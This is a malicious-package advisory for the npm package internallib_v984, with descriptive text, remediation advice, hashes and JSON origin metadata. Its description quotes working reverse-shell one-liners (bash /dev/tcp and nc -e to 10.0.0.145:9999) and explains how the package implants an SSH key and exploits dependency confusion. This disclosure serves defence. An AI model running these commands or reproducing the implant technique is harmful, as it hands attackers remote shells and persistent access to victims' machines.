-= Per source details. Do not edit below this line.=-
Package exports a single command() function that, when invoked, performs three coordinated attacks against the host: (1) appends a hardcoded attacker-controlled SSH public key (tr0n@DESKTOP-GVIA2J0) to authorized_keys under /root/.ssh, /home/gitlab-runner/.ssh, and /home/internal/.ssh, granting persistent remote root and CI-runner login; (2) reads /root/root.txt, /home/internal/user.txt, and /home/gitlab-runner/user.txt and writes their contents to stdout; (3) opens a reverse shell to 10.0.0.145:9999 using three redundant methods (bash -i >& /dev/tcp/10.0.0.145/9999 0>&1, nc -e /bin/bash 10.0.0.145 9999, and a Node net.Socket connecting to the same address with spawn('/bin/bash')). The package has no README, no author or repository metadata, and the name internallib_v984 is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality — the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (10.0.0.145) further indicates the attacker expects to land inside a corporate or lab network where that address is routable.
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
{
"malicious-packages-origins": [
{
"modified_time": "2026-06-12T15:28:18Z",
"id": "IN-MAL-2026-005784",
"source": "amazon-inspector",
"import_time": "2026-06-12T16:32:16.195323356Z",
"sha256": "093b5433386d2468e78e9896d1c8566d06f6f3ac6544dc90d4e6fdb9d967c6ed",
"versions": [
"1.0.2"
]
},
{
"modified_time": "2026-06-12T15:28:20Z",
"id": "IN-MAL-2026-005786",
"source": "amazon-inspector",
"import_time": "2026-06-12T16:32:16.316167869Z",
"sha256": "3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8",
"versions": [
"1.0.3"
]
},
{
"modified_time": "2026-06-12T15:28:18Z",
"id": "IN-MAL-2026-005783",
"source": "amazon-inspector",
"import_time": "2026-06-12T16:32:16.096173613Z",
"sha256": "5910f34f83567d2d5f48fc2c3966537cc4b313570d77696c743d116fc2b54f05",
"versions": [
"1.0.4"
]
},
{
"sha256": "7e1e3c1f3e148527111254b20a9cbe8d1a6f5d6abaadc0e45c35ca4b2febc431",
"id": "IN-MAL-2026-005785",
"source": "amazon-inspector",
"import_time": "2026-06-12T16:32:16.257323353Z",
"modified_time": "2026-06-12T15:28:19Z",
"versions": [
"99.0.0"
]
},
{
"sha256": "af6c7b94d4d81140d1e4d37ddf38ef298287d7e118ac0849311254c88ebb8916",
"id": "IN-MAL-2026-005782",
"source": "amazon-inspector",
"import_time": "2026-06-12T16:32:16.039312325Z",
"modified_time": "2026-06-12T15:28:17Z",
"versions": [
"1.0.5"
]
},
{
"sha256": "b62a6df4be478a792579b9f9741361e56e14fdd0d96f97305bf1fd4a0f076a06",
"id": "IN-MAL-2026-005787",
"source": "amazon-inspector",
"import_time": "2026-06-12T16:32:16.35801051Z",
"modified_time": "2026-06-12T15:28:21Z",
"versions": [
"1.0.1"
]
},
{
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "SEMVER"
}
],
"id": "GHSA-24jp-936m-6fg4",
"source": "ghsa-malware",
"import_time": "2026-06-15T23:52:17.781359039Z",
"modified_time": "2026-06-15T23:37:12Z",
"sha256": "a08961f26609280db99444778ce38929914922ef82a00497645032bf998ecc83"
}
]
}{
"package_integrity": [
{
"filename": "internallib_v984-1.0.2.tgz",
"hashes": {
"sha1": "e03ded23d8cae7cc88ab9c723cf5cb688f8669fe",
"sha512_sri": "sha512-nLD1bGfeZmQk66wo48E0yMss13QtTa/lSunlSs5nyzYLJy9cU92yB1yqWeVbG3W29H9aq4JUn9SBQq7e5VnPGw=="
}
}
],
"evidence_files": [
{
"path": "index.js",
"tlsh": "bb21001014f2223d1a3311a6eb17b067322388136229db517acc831a0f89e9c57ef3d4",
"sha256": "c56e66a9a2949458b1ff04c051c756d7da43c20d8d7de439f5902becdb704360"
},
{
"path": "package.json",
"tlsh": "5fc092b149266d3760d547b41db1890a36a68d3f9406b4485b232a0c80efef368f930c",
"sha256": "4efa558a27a2536419deb72dd9e9e73c9a541ca938a3b0a6e8e3376604db6ccb"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
}
]